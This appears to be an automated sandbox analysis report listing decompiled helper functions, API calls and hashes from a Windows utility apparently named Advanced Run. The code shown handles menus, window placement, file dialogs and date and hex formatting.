                                                                                                                            • Instruction Fuzzy Hash: 75318C31A00209EFDF14AF55CC86AAA7B76FF04320F1001AAF905BB2D2D735AA51DB95
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040605E, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 42%
                                                                                                                            			E0040605E(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
				struct tagMENUITEMINFOW _v0;
				int _t24;
				wchar_t* _t30;
				intOrPtr _t32;
				int _t34;
				int _t42;
				signed int _t47;
				signed int _t48;

				_t36 = __ecx;
				_t48 = _t47 & 0xfffffff8;
				E0040B550(0x203c, __ecx);
				_t24 = GetMenuItemCount(_a8);
				_t34 = _t24;
				_t42 = 0;
				if(_t34 <= 0) {
					L13:
					return _t24;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a50, 0, 0x2000);
					_t48 = _t48 + 0xc;
					_a36 =  &_a48;
					_v0.cbSize = 0x30;
					_a4 = 0x36;
					_a40 = 0x1000;
					_a16 = 0;
					_a48 = 0;
					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
					if(_t24 == 0) {
						goto L12;
					}
					if(_a48 == 0) {
						L10:
						_t56 = _a20;
						if(_a20 != 0) {
							_push(0);
							_push(_a20);
							_push(_a4);
							_t24 = E0040605E(_t36, _t56);
							_t48 = _t48 + 0xc;
						}
						goto L12;
					}
					_t30 = wcschr( &_a48, 9);
					if(_t30 != 0) {
						 *_t30 = 0;
					}
					_t31 = _a16;
					if(_a20 != 0) {
						if(_a12 == 0) {
							 *0x40fe20 =  *0x40fe20 + 1;
							_t32 =  *0x40fe20; // 0x0
							_t31 = _t32 + 0x11558;
							__eflags = _t32 + 0x11558;
						} else {
							_t17 = _t42 + 0x11171; // 0x11171
							_t31 = _t17;
						}
					}
					_t24 = E00406025(_t31,  &_a48);
					_pop(_t36);
					goto L10;
					L12:
					_t42 = _t42 + 1;
				} while (_t42 < _t34);
				goto L13;
			}











                                                                                                                            0x0040605e
                                                                                                                            0x00406061
                                                                                                                            0x00406069
                                                                                                                            0x00406074
                                                                                                                            0x0040607a
                                                                                                                            0x0040607e
                                                                                                                            0x00406082
                                                                                                                            0x00406148
                                                                                                                            0x0040614e
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406088
                                                                                                                            0x00406088
                                                                                                                            0x00406093
                                                                                                                            0x00406098
                                                                                                                            0x0040609f
                                                                                                                            0x004060ae
                                                                                                                            0x004060b6
                                                                                                                            0x004060be
                                                                                                                            0x004060c6
                                                                                                                            0x004060ca
                                                                                                                            0x004060cf
                                                                                                                            0x004060d7
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004060de
                                                                                                                            0x00406129
                                                                                                                            0x00406129
                                                                                                                            0x0040612d
                                                                                                                            0x0040612f
                                                                                                                            0x00406130
                                                                                                                            0x00406134
                                                                                                                            0x00406137
                                                                                                                            0x0040613c
                                                                                                                            0x0040613c
                                                                                                                            0x00000000
                                                                                                                            0x0040612d
                                                                                                                            0x004060e7
                                                                                                                            0x004060f0
                                                                                                                            0x004060f2
                                                                                                                            0x004060f2
                                                                                                                            0x004060f9
                                                                                                                            0x004060fd
                                                                                                                            0x00406102
                                                                                                                            0x0040610c
                                                                                                                            0x00406112
                                                                                                                            0x00406117
                                                                                                                            0x00406117
                                                                                                                            0x00406104
                                                                                                                            0x00406104
                                                                                                                            0x00406104
                                                                                                                            0x00406104
                                                                                                                            0x00406102
                                                                                                                            0x00406122
                                                                                                                            0x00406128
                                                                                                                            0x00000000
                                                                                                                            0x0040613f
                                                                                                                            0x0040613f
                                                                                                                            0x00406140
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                            • String ID: 0$6
                                                                                                                            • API String ID: 2029023288-3849865405
                                                                                                                            • Opcode ID: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                                            • Instruction ID: 45aed224341beddc1f9b42311d86e3f1d1daa84a2c492251b1da63e2972132ba
                                                                                                                            • Opcode Fuzzy Hash: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                                            • Instruction Fuzzy Hash: 7521F132504304ABC720DF45D84599FB7E8FB85754F000A3FF685A62D1E776C950CB8A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00402BEE, Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 82%
                                                                                                                            			E00402BEE(void* __ebx) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				void* _t27;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				int _t41;
				int _t50;

				_t34 = __ebx;
				if( *((intOrPtr*)(__ebx + 0x10)) == 0 ||  *((intOrPtr*)(__ebx + 0x14)) == 0) {
					return _t27;
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v8 = GetSystemMetrics(0x4e);
					_v12 = GetSystemMetrics(0x4f);
					_t41 = GetSystemMetrics(0x4c);
					_t31 = GetSystemMetrics(0x4d);
					if(_v8 == 0 || _v12 == 0) {
						_v8 = GetSystemMetrics(0);
						_v12 = GetSystemMetrics(1);
						_t41 = 0;
						_t31 = 0;
					} else {
						_v8 = _v8 + _t41;
						_v12 = _v12 + _t31;
					}
					_t50 = _v20 - _v28;
					if(_t50 > 0x14) {
						_t38 = _v24;
						_t37 = _v16 - _t38;
						if(_t37 > 0x14 && _v20 > _t41 + 5) {
							_t31 = _t31 + 0xfffffff6;
							if(_t38 >= _t31) {
								_t31 = _v28;
								if(_t31 + 0x14 < _v8 && _t38 + 0x14 < _v12 &&  *((intOrPtr*)(_t34 + 0x1c)) != 0) {
									_t31 = SetWindowPos( *(_t34 + 0x10), 0, _t31, _t38, _t50, _t37, 0x204);
								}
							}
						}
					}
					return _t31;
				}
			}
















                                                                                                                            0x00402bee
                                                                                                                            0x00402bf8
                                                                                                                            0x00402cae
                                                                                                                            0x00402c08
                                                                                                                            0x00402c10
                                                                                                                            0x00402c11
                                                                                                                            0x00402c12
                                                                                                                            0x00402c13
                                                                                                                            0x00402c20
                                                                                                                            0x00402c27
                                                                                                                            0x00402c2e
                                                                                                                            0x00402c30
                                                                                                                            0x00402c37
                                                                                                                            0x00402c4b
                                                                                                                            0x00402c50
                                                                                                                            0x00402c53
                                                                                                                            0x00402c55
                                                                                                                            0x00402c3e
                                                                                                                            0x00402c3e
                                                                                                                            0x00402c41
                                                                                                                            0x00402c41
                                                                                                                            0x00402c5a
                                                                                                                            0x00402c60
                                                                                                                            0x00402c65
                                                                                                                            0x00402c68
                                                                                                                            0x00402c6d
                                                                                                                            0x00402c77
                                                                                                                            0x00402c7c
                                                                                                                            0x00402c7e
                                                                                                                            0x00402c87
                                                                                                                            0x00402ca5
                                                                                                                            0x00402ca5
                                                                                                                            0x00402c87
                                                                                                                            0x00402c7c
                                                                                                                            0x00402c6d
                                                                                                                            0x00000000
                                                                                                                            0x00402cac

                                                                                                                            APIs
                                                                                                                            • GetSystemMetrics.USER32 ref: 00402C1C
                                                                                                                            • GetSystemMetrics.USER32 ref: 00402C23
                                                                                                                            • GetSystemMetrics.USER32 ref: 00402C2A
                                                                                                                            • GetSystemMetrics.USER32 ref: 00402C30
                                                                                                                            • GetSystemMetrics.USER32 ref: 00402C47
                                                                                                                            • GetSystemMetrics.USER32 ref: 00402C4E
                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204,?,?,?,?,?,?,?,?,0040365B), ref: 00402CA5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: MetricsSystem$Window
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1155976603-0
                                                                                                                            • Opcode ID: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                                                            • Instruction ID: 7065afd7c6b37d04baa6ac94661e9c3c7a9384fc7fb7d7b8ebf201216021487f
                                                                                                                            • Opcode Fuzzy Hash: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                                                            • Instruction Fuzzy Hash: B9217F72D00219EBEF14DF68CE496AF7B75EF40318F11446AD901BB1C5D2B8AD81CA98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004036D5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E004036D5(void* __edi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char* _v24;
				char _v28;
				char* _v48;
				intOrPtr _v56;
				intOrPtr _v60;
				int _v64;
				int _v72;
				intOrPtr _v76;
				wchar_t* _v80;
				intOrPtr _v84;
				int _v92;
				char* _v96;
				intOrPtr _v104;
				struct tagOFNA _v108;
				void _v634;
				long _v636;
				void _v2682;
				char _v2684;
				void* __ebx;
				char _t37;
				intOrPtr _t38;
				int _t46;
				signed short _t54;

				_v636 = 0;
				memset( &_v634, 0, 0x208);
				_v2684 = 0;
				memset( &_v2682, 0, 0x7fe);
				_t37 =  *((intOrPtr*)(L"cfg")); // 0x660063
				_v12 = _t37;
				_t38 =  *0x40cbf0; // 0x67
				_v8 = _t38;
				_v28 = E00405B81(0x227);
				_v24 = L"*.cfg";
				_v20 = E00405B81(0x228);
				_v16 = L"*.*";
				E00405236( &_v2684,  &_v28);
				_t54 = 0xa;
				_v60 = E00405B81(_t54);
				_v104 =  *((intOrPtr*)(__edi + 0x10));
				_v48 =  &_v12;
				_v96 =  &_v2684;
				_v108 = 0x4c;
				_v92 = 0;
				_v84 = 1;
				_v80 =  &_v636;
				_v76 = 0x104;
				_v72 = 0;
				_v64 = 0;
				_v56 = 0x80806;
				_t46 = GetSaveFileNameW( &_v108);
				if(_t46 != 0) {
					wcscpy( &_v636, _v80);
					return E0040365E(__edi, 1,  &_v636);
				}
				return _t46;
			}






























                                                                                                                            0x004036ef
                                                                                                                            0x004036f6
                                                                                                                            0x0040370b
                                                                                                                            0x00403712
                                                                                                                            0x00403717
                                                                                                                            0x0040371c
                                                                                                                            0x0040371f
                                                                                                                            0x0040372c
                                                                                                                            0x00403735
                                                                                                                            0x00403738
                                                                                                                            0x00403744
                                                                                                                            0x00403751
                                                                                                                            0x00403758
                                                                                                                            0x00403760
                                                                                                                            0x00403769
                                                                                                                            0x0040376c
                                                                                                                            0x00403778
                                                                                                                            0x0040377b
                                                                                                                            0x0040378b
                                                                                                                            0x00403792
                                                                                                                            0x00403795
                                                                                                                            0x00403798
                                                                                                                            0x0040379b
                                                                                                                            0x004037a2
                                                                                                                            0x004037a5
                                                                                                                            0x004037a8
                                                                                                                            0x004037af
                                                                                                                            0x004037b7
                                                                                                                            0x004037c3
                                                                                                                            0x00000000
                                                                                                                            0x004037d4
                                                                                                                            0x004037dc

                                                                                                                            APIs
                                                                                                                            • memset.MSVCRT ref: 004036F6
                                                                                                                            • memset.MSVCRT ref: 00403712
                                                                                                                              • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                              • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                              • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                              • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                              • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                              • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                              • Part of subcall function 00405236: memset.MSVCRT ref: 00405257
                                                                                                                              • Part of subcall function 00405236: _snwprintf.MSVCRT ref: 00405285
                                                                                                                              • Part of subcall function 00405236: wcslen.MSVCRT ref: 00405291
                                                                                                                              • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052A9
                                                                                                                              • Part of subcall function 00405236: wcslen.MSVCRT ref: 004052B7
                                                                                                                              • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052CA
                                                                                                                            • GetSaveFileNameW.COMDLG32(?), ref: 004037AF
                                                                                                                            • wcscpy.MSVCRT ref: 004037C3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: memcpymemsetwcslen$HandleModulewcscpy$FileLoadNameSaveString_snwprintf
                                                                                                                            • String ID: L$cfg
                                                                                                                            • API String ID: 275899518-3734058911
                                                                                                                            • Opcode ID: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                                            • Instruction ID: 069f946bae6f7cb0c9846f37a0b0d91fba0b14879ba0d1f27e167351657a8a18
                                                                                                                            • Opcode Fuzzy Hash: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                                            • Instruction Fuzzy Hash: 78312AB1D04218AFDB50DFA5D889ADEBBB8FF04314F10416AE508B6280DB746A85CF99
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00404ED0, Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00404ED0(FILETIME* __eax, wchar_t* _a4) {
				struct _SYSTEMTIME _v20;
				long _v276;
				long _v532;
				FILETIME* _t15;

				_t15 = __eax;
				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
					if(FileTimeToSystemTime(_t15,  &_v20) == 0 || _v20 <= 0x3e8) {
						goto L5;
					} else {
						GetDateFormatW(0x400, 1,  &_v20, 0,  &_v276, 0x80);
						GetTimeFormatW(0x400, 0,  &_v20, 0,  &_v532, 0x80);
						wcscpy(_a4,  &_v276);
						wcscat(_a4, " ");
						wcscat(_a4,  &_v532);
					}
				} else {
					L5:
					wcscpy(_a4, 0x40c4e8);
				}
				return _a4;
			}







                                                                                                                            0x00404ed0
                                                                                                                            0x00404edf
                                                                                                                            0x00404ef6
                                                                                                                            0x00000000
                                                                                                                            0x00404f00
                                                                                                                            0x00404f1c
                                                                                                                            0x00404f31
                                                                                                                            0x00404f41
                                                                                                                            0x00404f4e
                                                                                                                            0x00404f5d
                                                                                                                            0x00404f66
                                                                                                                            0x00404f69
                                                                                                                            0x00404f69
                                                                                                                            0x00404f71
                                                                                                                            0x00404f77
                                                                                                                            0x00404f7d

                                                                                                                            APIs
                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00404EEE
                                                                                                                            • GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F1C
                                                                                                                            • GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F31
                                                                                                                            • wcscpy.MSVCRT ref: 00404F41
                                                                                                                            • wcscat.MSVCRT ref: 00404F4E
                                                                                                                            • wcscat.MSVCRT ref: 00404F5D
                                                                                                                            • wcscpy.MSVCRT ref: 00404F71
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1331804452-0
                                                                                                                            • Opcode ID: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                                                            • Instruction ID: 27f756489727a3478797c508db698983d473b6c4fef27ef98cb5a9ae0a7a07e8
                                                                                                                            • Opcode Fuzzy Hash: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                                                            • Instruction Fuzzy Hash: 951160B2840119EBDB11AB94DC85EFE776CFB44304F04457ABA05B6090D774AA858BA8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00404FE0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 71%
                                                                                                                            			E00404FE0(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
				void _v514;
				long _v516;
				wchar_t* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t34 = __edi;
				_v516 = _v516 & 0x00000000;
				memset( &_v514, 0, 0x1fc);
				 *__edi =  *__edi & 0x00000000;
				_t37 = _t36 + 0xc;
				_t35 = 0;
				do {
					_push( *(_t35 + _a4) & 0x000000ff);
					_push(L"%2.2X");
					_push(0xff);
					_push( &_v516);
					L0040B1EC();
					_t37 = _t37 + 0x10;
					if(_t35 > 0) {
						wcscat(_t34, " ");
					}
					if(_a8 > 0) {
						asm("cdq");
						if(_t35 % _a8 == 0) {
							wcscat(_t34, L"  ");
						}
					}
					wcscat(_t34,  &_v516);
					_t35 = _t35 + 1;
				} while (_t35 < 0x80);
				return _t34;
			}









                                                                                                                            0x00404fe0
                                                                                                                            0x00404fe9
                                                                                                                            0x00405000
                                                                                                                            0x00405005
                                                                                                                            0x00405009
                                                                                                                            0x0040500c
                                                                                                                            0x0040500e
                                                                                                                            0x00405015
                                                                                                                            0x00405016
                                                                                                                            0x00405021
                                                                                                                            0x00405026
                                                                                                                            0x00405027
                                                                                                                            0x0040502c
                                                                                                                            0x00405031
                                                                                                                            0x00405039
                                                                                                                            0x0040503f
                                                                                                                            0x00405044
                                                                                                                            0x00405048
                                                                                                                            0x0040504e
                                                                                                                            0x00405056
                                                                                                                            0x0040505c
                                                                                                                            0x0040504e
                                                                                                                            0x00405065
                                                                                                                            0x0040506a
                                                                                                                            0x00405072
                                                                                                                            0x00405079

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: wcscat$_snwprintfmemset
                                                                                                                            • String ID: %2.2X
                                                                                                                            • API String ID: 2521778956-791839006
                                                                                                                            • Opcode ID: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                                                            • Instruction ID: 93e5f8641594d75a0278127c9762c797554eaad4f41234795e116b90c7bd1a0f
                                                                                                                            • Opcode Fuzzy Hash: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                                                            • Instruction Fuzzy Hash: FA01B57394072566E72067569C86BBB33ACEB41714F10407BFD14B91C2EB7CDA444ADC
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00407D80, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 42%
                                                                                                                            			E00407D80(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void* __esi;
				intOrPtr* _t16;
				void* _t19;
				intOrPtr* _t29;
				char* _t31;

				_t29 = __ecx;
				_v516 = 0;
				memset( &_v514, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t16 = _t29;
				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
				} else {
					_push(L"<?xml version=\"1.0\" ?>\r\n");
				}
				E00407343(_t16);
				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
				_t31 =  &_v516;
				E00407250(_t31, _t19);
				_push(_t31);
				_push(L"<%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t29, _a4,  &_v1028);
			}












                                                                                                                            0x00407d9c
                                                                                                                            0x00407d9e
                                                                                                                            0x00407da5
                                                                                                                            0x00407db3
                                                                                                                            0x00407dba
                                                                                                                            0x00407dc5
                                                                                                                            0x00407dc7
                                                                                                                            0x00407dd0
                                                                                                                            0x00407dc9
                                                                                                                            0x00407dc9
                                                                                                                            0x00407dc9
                                                                                                                            0x00407dd8
                                                                                                                            0x00407de1
                                                                                                                            0x00407de5
                                                                                                                            0x00407deb
                                                                                                                            0x00407df2
                                                                                                                            0x00407df3
                                                                                                                            0x00407dfe
                                                                                                                            0x00407e03
                                                                                                                            0x00407e04
                                                                                                                            0x00407e21

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00407DD0
                                                                                                                            • <?xml version="1.0" ?>, xrefs: 00407DC9
                                                                                                                            • <%s>, xrefs: 00407DF3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: memset$_snwprintf
                                                                                                                            • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                            • API String ID: 3473751417-2880344631
                                                                                                                            • Opcode ID: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                                                            • Instruction ID: f522b8c77a058770ba0888167d6ec5df55c59d6d485a4440fbbc7c77367e2349
                                                                                                                            • Opcode Fuzzy Hash: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                                                            • Instruction Fuzzy Hash: E0019BB1E402197AD710A695CC45FBE766CEF44344F0001FBBA08F3191D738AE4586ED
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00403B3C, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 52COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 70%
                                                                                                                            			E00403B3C(intOrPtr _a4) {
				void _v526;
				char _v528;
				void _v2574;
				char _v2576;
				void* __edi;
				intOrPtr _t29;

				_v2576 = 0;
				memset( &_v2574, 0, 0x7fe);
				_v528 = 0;
				memset( &_v526, 0, 0x208);
				E00404AD9( &_v528);
				_push( &_v528);
				_push(L"\"%s\" /EXEFilename \"%%1\"");
				_push(0x3ff);
				_push( &_v2576);
				L0040B1EC();
				_t37 = _a4 + 0xa68;
				E00404923(0x104, _a4 + 0xa68, L"exefile");
				E00404923(0x104, _a4 + 0xc72, L"Advanced Run");
				E00404923(0x3ff, _t37 + 0x414,  &_v2576);
				_t29 = E0040467A(_t37);
				 *((intOrPtr*)(_a4 + 0x167c)) = _t29;
				return _t29;
			}









                                                                                                                            0x00403b56
                                                                                                                            0x00403b5d
                                                                                                                            0x00403b6f
                                                                                                                            0x00403b76
                                                                                                                            0x00403b82
                                                                                                                            0x00403b8d
                                                                                                                            0x00403b8e
                                                                                                                            0x00403b99
                                                                                                                            0x00403b9e
                                                                                                                            0x00403b9f
                                                                                                                            0x00403ba7
                                                                                                                            0x00403bb9
                                                                                                                            0x00403bce
                                                                                                                            0x00403be5
                                                                                                                            0x00403bef
                                                                                                                            0x00403bf8
                                                                                                                            0x00403c00

                                                                                                                            APIs
                                                                                                                            • memset.MSVCRT ref: 00403B5D
                                                                                                                            • memset.MSVCRT ref: 00403B76
                                                                                                                              • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                            • _snwprintf.MSVCRT ref: 00403B9F
                                                                                                                              • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                              • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                              • Part of subcall function 0040467A: memset.MSVCRT ref: 004046AF
                                                                                                                              • Part of subcall function 0040467A: _snwprintf.MSVCRT ref: 004046CD
                                                                                                                              • Part of subcall function 0040467A: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                                                              • Part of subcall function 0040467A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: memset$_snwprintf$CloseFileModuleNameOpenmemcpywcslen
                                                                                                                            • String ID: "%s" /EXEFilename "%%1"$Advanced Run$exefile
                                                                                                                            • API String ID: 1832587304-479876776
                                                                                                                            • Opcode ID: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                                                            • Instruction ID: c5548abdd2f98fe5b378efca96f69d72dd5acd8230f4ce7b006819db5738462c
                                                                                                                            • Opcode Fuzzy Hash: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                                                            • Instruction Fuzzy Hash: 6B11A3B29403186AD720E761CC05ACF776CDF45314F0041B6BA08B71C2D77C5B418B9E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040AFBE, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0040AFBE(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
				void* _v8;
				int _v12;
				short _v524;
				char _v1036;
				void* __edi;

				wcscpy( &_v524, L"\\StringFileInfo\\");
				wcscat( &_v524, _a8);
				wcscat( &_v524, "\\");
				wcscat( &_v524, _a12);
				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
					return 0;
				}
				_t34 =  &_v1036;
				E00404923(0xff,  &_v1036, _v8);
				E004049A2(_t34, __esi);
				return 1;
			}








                                                                                                                            0x0040afd3
                                                                                                                            0x0040afe2
                                                                                                                            0x0040aff3
                                                                                                                            0x0040b002
                                                                                                                            0x0040b023
